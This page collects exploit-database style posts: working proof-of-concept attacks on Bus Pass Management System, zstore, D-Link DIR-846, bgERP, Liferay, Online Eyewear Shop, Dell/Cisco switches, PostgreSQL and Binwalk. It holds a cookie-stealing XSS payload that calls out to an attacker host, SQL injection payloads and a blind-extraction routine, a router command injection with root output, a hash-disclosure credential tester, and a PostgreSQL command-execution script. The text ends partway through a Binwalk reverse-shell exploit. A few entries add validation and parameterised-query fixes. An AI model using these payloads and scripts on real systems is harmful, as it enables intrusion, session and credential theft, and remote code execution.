All posts published by ISHACK AI BOT
-
Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2021-09-17
# Exploit Author: Matteo Conti - https://deltaspike.io
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 - LAMP

# Description
The application lets visitors send a message to the admin from the "contacts" section. If an XSS payload is placed in the title or message field (and possibly in the email field once the client-side checks are bypassed), the payload is stored and executes when the admin opens the message to read it.

# Vulnerable page:
/admin/view-enquiry.php?viewid=1 (change "viewid" to the id of the message)

# Tested Payload:
<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>

# Proof of concept:
- From /contact.php, send a message containing the following payload in the "title" or "message" field:
  <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
  (the first URL has to point at an existing image, otherwise onload never fires)
- Log in with admin credentials, open /admin/unreadenq.php and click "view" next to the new message to execute the payload. After the first view, the payload can be triggered again from /admin/readenq.php.
- Your listener receives the PHP session id; document.cookie can read it because the session cookie is set without the HttpOnly flag.
-
zstore 6.6.0 - Cross-Site Scripting (XSS)
## Exploit Title: zstore 6.6.0 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 01.29.2023
## Vendor: https://zippy.com.ua/
## Software: https://github.com/leon-mbs/zstore/releases/tag/6.5.4
## Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/zippy/zstore-6.5.4

## Description:
The value of manual insertion `point 1` is copied into the HTML document as plain text between tags. The payload giflc<img src=a onerror=alert(1)>c0yu0 was submitted in manual insertion point 1, and this input was echoed unmodified in the application's response. In the request below the injected markup sits in the `p` parameter (URL-decoded: `App/Pages/Chat` followed by `<a>`/`<img>` tags); the application treats `p` as a class name and reflects it unescaped in its "Class ... does not exist" error message.

## STATUS: HIGH Vulnerability

[+] Exploit:
```
GET /index.php?p=%41%70%70%2f%50%61%67%65%73%2f%43%68%61%74%67%69%66%6c%63%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%77%77%77%2e%79%6f%75%74%75%62%65%2e%63%6f%6d%2f%77%61%74%63%68%3f%76%3d%6d%68%45%76%56%39%51%37%7a%66%45%22%3e%3c%69%6d%67%20%73%72%63%3d%68%74%74%70%73%3a%2f%2f%6d%65%64%69%61%2e%74%65%6e%6f%72%2e%63%6f%6d%2f%2d%4b%39%73%48%78%58%41%62%2d%63%41%41%41%41%43%2f%73%68%61%6d%65%2d%6f%6e%2d%79%6f%75%2d%70%61%74%72%69%63%69%61%2e%67%69%66%22%3e%0a HTTP/2
Host: store.zippy.com.ua
Cookie: PHPSESSID=f816ed0ddb0c43828cb387f992ac8521; last_chat_id=439
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://store.zippy.com.ua/index.php?q=p:App/Pages/Main
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```

[+] Response:
```
HTTP/2 200 OK
Server: nginx
Date: Sun, 29 Jan 2023 07:27:55 GMT
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Ray: p529:0.010/wn19119:0.010/wa19119:D=12546

Class \App\Pages\Chatgiflc<a href="https:\\www.youtube.com\watch?v=mhEvV9Q7zfE"><img src=https:\\media.tenor.com\-K9sHxXAb-cAAAAC\shame-on-you-patricia.gif"> does not exist<br>82<br>/home/zippy00/zippy.com.ua/store/vendor/leon-mbs/zippy/core/webapplication.php<br>
```

## Proof and Exploit:
[href](https://streamable.com/aadj5c)

## Reference:
[href](https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
-
D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability
# Google Dork: NA
# Date: 30/01/2023
# Exploit Author: Françoa Taffarel
# Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suporte
# Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip
# Version: DIR846enFW100A53DBR-Retail
# Tested on: D-LINK DIR-846
# CVE : CVE-2022-46552

D-Link DIR-846 firmware FW100A53DBR contains a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter of the HNAP SetIpMacBindSettings action, exploited with a crafted POST request. The request below carries a valid HNAP_AUTH header and session cookies, so an authenticated session on the router's web interface is required. The injected `$(id>rce_confirmed)` is evaluated by a shell on the router and writes the output of `id` into the web root, from where a second request reads it back.

### Malicious POST Request
```
POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings"
HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285
Content-Length: 171
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4

{"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}}
```

### Response
```
HTTP/1.1 200 OK
X-Powered-By: PHP/7.1.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Connection: close
Date: Thu, 01 Dec 2022 11:03:54 GMT
Server: lighttpd/1.4.35
Content-Length: 68

{"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}}
```

### Data from RCE Request
```
GET /HNAP1/rce_confirmed HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1
Upgrade-Insecure-Requests: 1
```

### Response
```
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Date: Thu, 01 Dec 2022 23:24:28 GMT
Server: lighttpd/1.4.35

uid=0(root) gid=0(root)
```
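The injection works because the firmware hands the raw `lan(0)_dhcps_staticlist` string to a shell. The following is an added example (not D-Link code and not part of the advisory) of what input validation for that parameter should look like before it is used anywhere: every field is checked against the only shape a DHCP reservation can have, so `$(id>rce_confirmed)` is rejected outright. The field order (enable flag, hostname, MAC, IPv4) is inferred from the single record in the PoC and is an assumption, as is the hostname character set.

```python
import ipaddress
import re

# Field order assumed from the PoC record "1,<host>,<mac>,<ip>"; the real
# firmware format is not documented on this page.
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")
# RFC 1123 label: letters, digits and interior hyphens, 1..63 chars (assumed policy)
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
SHELL_META = set("$`;|&<>(){}\n\r'\"\\")


class StaticListError(ValueError):
    """Raised when a lan(0)_dhcps_staticlist record is not a DHCP reservation."""


def parse_dhcps_staticlist(value: str) -> dict:
    """Parse one record and return its fields normalised.

    Everything that is not exactly <0|1>,<hostname>,<mac>,<ipv4> is refused,
    so shell syntax never reaches whatever consumes the record."""
    parts = value.split(",")
    if len(parts) != 4:
        raise StaticListError(f"expected 4 fields, got {len(parts)}")
    enable, hostname, mac, ip = parts
    if enable not in ("0", "1"):
        raise StaticListError("enable flag must be 0 or 1")
    if not HOSTNAME_RE.match(hostname):
        raise StaticListError("hostname contains characters outside [A-Za-z0-9-]")
    if not MAC_RE.match(mac):
        raise StaticListError("malformed MAC address")
    try:
        addr = ipaddress.IPv4Address(ip)
    except ipaddress.AddressValueError as exc:
        raise StaticListError(f"malformed IPv4 address: {exc}") from None
    return {
        "enable": enable == "1",
        "hostname": hostname,
        "mac": mac.lower(),
        "ip": str(addr),
    }


def shell_metachars(value: str) -> set:
    """Shell metacharacters present in a rejected value, for logging the
    attempt without ever re-interpreting the string."""
    return set(value) & SHELL_META


if __name__ == "__main__":
    # The record from the advisory versus a legitimate reservation.
    for record in ("1,printer-1,02:42:D6:F9:DC:4E,192.168.0.15",
                   "1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"):
        try:
            print("accepted:", parse_dhcps_staticlist(record))
        except StaticListError as err:
            print("rejected:", err, "metachars:", sorted(shell_metachars(record)))
```

Validation like this is a second line of defence. The actual fix is to stop interpolating the value into a shell command at all (pass arguments as an argv array or write the configuration file directly); with a shell in the path, any validation gap is a command-injection gap.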
-
bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)
## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 01.31.2023
## Vendor: https://bgerp.com/Bg/Za-sistemata
## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31
## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based

## Description:
The bgERP system suffers from unsecured login cookies: very sensitive login and session information is stored in them. An attacker can trick an already logged-in user, steal the cookie the system generated, and do VERY DANGEROUS things with the sensitive information stored in it. This can be very expensive for every company using this system, so please be careful! The system also has a search parameter vulnerable to reflected XSS.

## STATUS: HIGH Vulnerability

[+] Exploit:
```
GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1 HTTP/1.1
Host: 192.168.100.77:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.100.77:8080/Portal/Show
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0
Connection: close
Content-Length: 0
```

[+] Response after logout of the system:
```
HTTP/1.1 302 Found
Date: Tue, 31 Jan 2023 15:13:26 GMT
Server: Apache/2.4.41 (Ubuntu)
Expires: 0
Cache-Control: no-cache, must-revalidate
Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472
Connection: close
Content-Length: 2
Content-Encoding: none
Content-Type: text/html; charset=UTF-8

OK
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected)

## Proof and Exploit:
[href](https://streamable.com/xhffdu)

## Time spent
`01:30:00`
-
Liferay Portal 6.2.5 - Insecure Permissions
# Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions
# Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/
# Date: 2021/05
# Exploit Author: fu2x2000
# Version: Liferay Portal 6.2.5 or later
# CVE : CVE-2021-33990

import requests

print("Search this on Google #Dork for liferay -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")

# Base URL of the target, e.g. https://example.org (no trailing slash)
target = "URL Goes Here"
# The CKEditor file manager browser page; reachable without authentication on affected installs
url = target + "/html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html"

req = requests.get(url)
print(req)
sta = req.status_code

if sta == 200:
    print('Liferay vulnerability exists')
    print(url)
    # File manager connector command that an exposed browser accepts (not sent by this script)
    inject = "Command=FileUpload&Type=File&CurrentFolder=/"
    # cook_inject = url + inject
    # print(cook_inject)
else:
    print('not found, try another method')

print("solution: restrict access and user groups")
-
Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)
# Exploit Title: Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)
# Date: 2023-01-02
# Exploit Author: Muhammad Navaid Zafar Ansari
# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip
# Version: 1.0
# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)
# CVE: Not Assigned Yet
# References: -

------------------------------------------------------------------------------------
1. Description:
----------------------
Online Eyewear Shop 1.0 allows unauthenticated SQL injection via the 'id' parameter of 'oews/?p=products/view_product&id=?'. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

2. Proof of Concept:
----------------------
Step 1 - Visit http://localhost/oews/?p=products/view_product&id=5 and append a single quote to the id value to confirm the injection.

Step 2 - Run:
sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql

SQLMap Response:
```
[*] starting @ 04:49:58 /2023-02-01/

[04:49:58] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK
---
[04:50:00] [INFO] testing MySQL
[04:50:00] [INFO] confirming MySQL
[04:50:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.55, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
```

3. Example payload:
----------------------
(boolean-based)
' AND 1=1 AND 'test'='test

4. Burpsuite request:
----------------------
The UNION payload below matches the 14 columns of the original query and places user() and version() in the 3rd and 13th positions, so both values appear in the rendered product page.
```
GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1
Host: localhost
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip
Connection: close
```
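The sqlmap output above reports a boolean-based blind injection: the page behaves differently depending on whether the condition appended to `id` is true. The following added example (Python, standard library only; not the advisory's code and not the shop's PHP) reproduces that oracle against an in-memory SQLite stand-in for the products table, with constructed rows, and shows both the string-concatenated query sqlmap found and the parameterised version that does not react to the same payloads. The last function walks the oracle character by character the way sqlmap's boolean technique does.

```python
import sqlite3

# Constructed sample data standing in for the shop's products table.
# The real application runs on MySQL/MariaDB; the oracle logic is identical.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    con.executemany("INSERT INTO products VALUES (?, ?, ?)",
                    [(3, "Aviator", 89.0), (5, "Wayfarer", 120.0)])
    return con


def view_product_vulnerable(con, product_id: str) -> list:
    """Mirrors the pattern sqlmap reported: the id value is quoted into the SQL text,
    so a value containing a quote changes the WHERE clause."""
    sql = f"SELECT id, name, price FROM products WHERE id = '{product_id}'"
    return con.execute(sql).fetchall()


def view_product_fixed(con, product_id: str) -> list:
    """Parameterised version: the value is bound, never parsed as SQL."""
    return con.execute("SELECT id, name, price FROM products WHERE id = ?",
                       (product_id,)).fetchall()


# The boolean-based pair from the sqlmap output (second one flipped to false)
TRUE_PAYLOAD = "3' AND 4759=4759 AND 'oKly'='oKly"
FALSE_PAYLOAD = "3' AND 4759=4760 AND 'oKly'='oKly"


def boolean_oracle(query_fn, con, base_id: str, condition: str) -> bool:
    """One yes/no question asked through the injection point: the product row
    only comes back when `condition` evaluates true inside the WHERE clause."""
    payload = f"{base_id}' AND {condition} AND 'x'='x"
    return len(query_fn(con, payload)) > 0


def blind_extract(query_fn, con, expr: str, base_id: str = "3", max_len: int = 32) -> str:
    """Recover the value of a SQL expression one character at a time through the
    oracle. Linear search over printable ASCII for clarity; sqlmap bisects.
    Uses SQLite's unicode()/substr(); on MySQL the equivalents are ascii()/substring()."""
    out = ""
    for i in range(1, max_len + 1):
        if not boolean_oracle(query_fn, con, base_id, f"length(({expr}))>={i}"):
            break
        for code in range(32, 127):
            if boolean_oracle(query_fn, con, base_id, f"unicode(substr(({expr}),{i},1))={code}"):
                out += chr(code)
                break
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, true  :", view_product_vulnerable(db, TRUE_PAYLOAD))
    print("vulnerable, false :", view_product_vulnerable(db, FALSE_PAYLOAD))
    print("fixed, true       :", view_product_fixed(db, TRUE_PAYLOAD))
    print("extracted name    :", blind_extract(view_product_vulnerable, db,
                                               "SELECT name FROM products WHERE id=5"))
```

The fixed variant returns nothing for either payload because the whole string, quote and all, is compared against the integer id; that is the behaviour the fix has to restore in `view_product`.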
-
Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure
# DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US
#   https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability
#   https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos
# CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter
# Discovered by Ken 's1ngular1ty' Pyle

import requests
import re
import hashlib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

if len(sys.argv) < 3:
    print("Usage: python cve-2019-15993.py URL passwordfile")
    sys.exit()

url = sys.argv[1]
file = sys.argv[2]

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


def hash_value(value):
    """Calculate the SHA1 hash of a value."""
    sha1 = hashlib.sha1()
    sha1.update(value.encode('utf-8'))
    return sha1.hexdigest()


def userName_parser(text, start_delimiter, end_delimiter):
    """Return every substring enclosed by start_delimiter and end_delimiter."""
    results = []
    start = 0
    while start >= 0:
        start = text.find(start_delimiter, start)
        if start >= 0:
            start += len(start_delimiter)
            end = text.find(end_delimiter, start)
            if end >= 0:
                results.append(text[start:end])
                start = end + len(end_delimiter)
    return results


# retrieve the web page
response = requests.get(url, allow_redirects=False, verify=False)

# Read in the candidate passwords and pre-compute their SHA1 digests
with open(file, 'r') as f:
    values = [value.strip() for value in f.readlines()]
hashes = {hash_value(value): value for value in values}

if response.status_code == 302:
    print("Cisco / Dell / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n")
    # the redirect target carries the per-device API path; the admin user settings XML hangs off it
    url = response.headers["Location"] + "config/device/adminusersetting"
    response = requests.get(url, verify=False)
    if response.status_code == 200:
        print("[*] Successful request to URL:", url + "\n")
        content = response.text
        users_names = userName_parser(content, "<userName>", "</userName>")
        sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content)
        print("SHA1 Hashes found:\n")
        # the n-th <userName> in the document belongs to the n-th hash
        for user_name, sha1_hash in zip(users_names, sha1_hashes):
            print("Username: " + user_name + "\n" + "SHA1 Hash: " + sha1_hash + "\n")
            if sha1_hash in hashes:
                print("Match:", sha1_hash, hashes[sha1_hash])
                print("\nTesting Credentials via API.\n\n")
                payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + user_name + "&password=" + hashes[sha1_hash])
                response_login = requests.get(payload, allow_redirects=False, verify=False)
                headers = response_login.headers
                if "sessionID" in headers:
                    print("Username & Password for " + user_name + " is correct.\n\nThe SessionID Token / Cookie is:\n")
                    print(headers["sessionID"])
                else:
                    print("Unable to sign in.")
    else:
        print("User settings not readable:", response.status_code)
else:
    print("Host is not vulnerable:", response.status_code)

--
Ken Pyle, M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+
Main: 267-540-3337
Direct: 484-498-8340
Email: [email protected]
Website: www.cybir.com
-
PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 2023-02-01
# Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon
# Github: https://github.com/paulotrindadec/CVE-2019-9193
# Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu
# Tested on: Red Hat Enterprise Linux Server 7.9
# CVE: CVE-2019-9193
#
# Note: COPY ... FROM PROGRAM is limited to superusers (and, from PostgreSQL 11,
# members of pg_execute_server_program); the PostgreSQL project treats this as
# intended behaviour rather than a vulnerability. The PoC therefore needs a login
# with those privileges, and the command runs as the OS user the server runs as.

#!/usr/bin/python3
import sys
import psycopg2
import argparse


def parseArgs():
    parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution')
    parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]')
    parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]')
    parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to connect to the PostgreSQL DB [Default: postgres]')
    parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to connect to the PostgreSQL DB [Default: postgres]')
    parser.add_argument('-c', '--command', nargs='?', help='System command to run')
    args = parser.parse_args()
    return args


def main():
    try:
        # Variables
        RHOST = args.ip
        RPORT = args.port
        USER = args.user
        PASS = args.password
        print(f"\r\n[+] Connect to PostgreSQL - {RHOST}")
        con = psycopg2.connect(host=RHOST, port=RPORT, user=USER, password=PASS)
        if args.command:
            exploit(con)
        else:
            print("[!] Add argument -c [COMMAND] to execute system commands")
    except psycopg2.OperationalError as e:
        print("Error")
        print("\r\n[-] Failed to connect with PostgreSQL")
        sys.exit()


def exploit(con):
    cur = con.cursor()
    CMD = args.command
    try:
        print('[*] Running\n')
        # clean up leftovers from a previous run (IF EXISTS so a first run does not abort here)
        cur.execute("DROP TABLE IF EXISTS triggeroffsec;")
        cur.execute("DROP FUNCTION IF EXISTS triggeroffsecexeccmd() CASCADE;")
        cur.execute("DROP TABLE IF EXISTS triggeroffsecsource;")
        cur.execute("DROP TRIGGER IF EXISTS shoottriggeroffsecexeccmd ON triggeroffsecsource;")
        # table that receives the command output, one row per output line
        cur.execute("CREATE TABLE triggeroffsec (id serial PRIMARY KEY, cmdout text);")
        # trigger function: COPY ... FROM PROGRAM runs CMD via the server's shell
        cur.execute("""CREATE OR REPLACE FUNCTION triggeroffsecexeccmd()
RETURNS TRIGGER
LANGUAGE plpgsql
AS $BODY$
BEGIN
COPY triggeroffsec (cmdout) FROM PROGRAM %s;
RETURN NULL;
END;
$BODY$;
""", [CMD, ])
        cur.execute("CREATE TABLE triggeroffsecsource(s_id integer PRIMARY KEY);")
        cur.execute("""CREATE TRIGGER shoottriggeroffsecexeccmd
AFTER INSERT ON triggeroffsecsource
FOR EACH STATEMENT
EXECUTE PROCEDURE triggeroffsecexeccmd();
""")
        # the insert fires the trigger, which runs the command
        cur.execute("INSERT INTO triggeroffsecsource VALUES (2);")
        cur.execute("TABLE triggeroffsec;")
        con.commit()
        returncmd = cur.fetchall()
        for result in returncmd:
            print(result)
    except (Exception, psycopg2.DatabaseError) as error:
        print(error)
    finally:
        if con is not None:
            con.close()
            # print("Closed connection")


if __name__ == "__main__":
    args = parseArgs()
    main()
-
Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE)
# Exploit Author: Etienne Lacoche
# CVE-ID: CVE-2022-4510
#
# A crafted PFS filesystem carries an entry named
# ../../../.config/binwalk/plugins/binwalk.py. Binwalk's PFS extractor writes it
# relative to the extraction directory, so running `binwalk -e` on the file drops
# a plugin into the user's binwalk plugin folder, which binwalk loads on its next run.

import os
import argparse

print("")
print("################################################")
print("------------------CVE-2022-4510----------------")
print("################################################")
print("--------Binwalk Remote Command Execution--------")
print("------Binwalk 2.1.2b through 2.3.2 included-----")
print("------------------------------------------------")
print("################################################")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("------------------Discovered by:----------------")
print("---------Q. Kaiser, ONEKEY Research Lab---------")
print("---------Exploit tested on debian 11------------")
print("################################################")
print("")

parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input .png file", default=1)
parser.add_argument("ip", help="Ip to nc listener", default=1)
parser.add_argument("port", help="Port to nc listener", default=1)
args = parser.parse_args()

if args.file and args.ip and args.port:
    # PFS/0.9 header with a single entry whose name is the traversal path above;
    # the trailing fields give the entry id, the data offset and its length
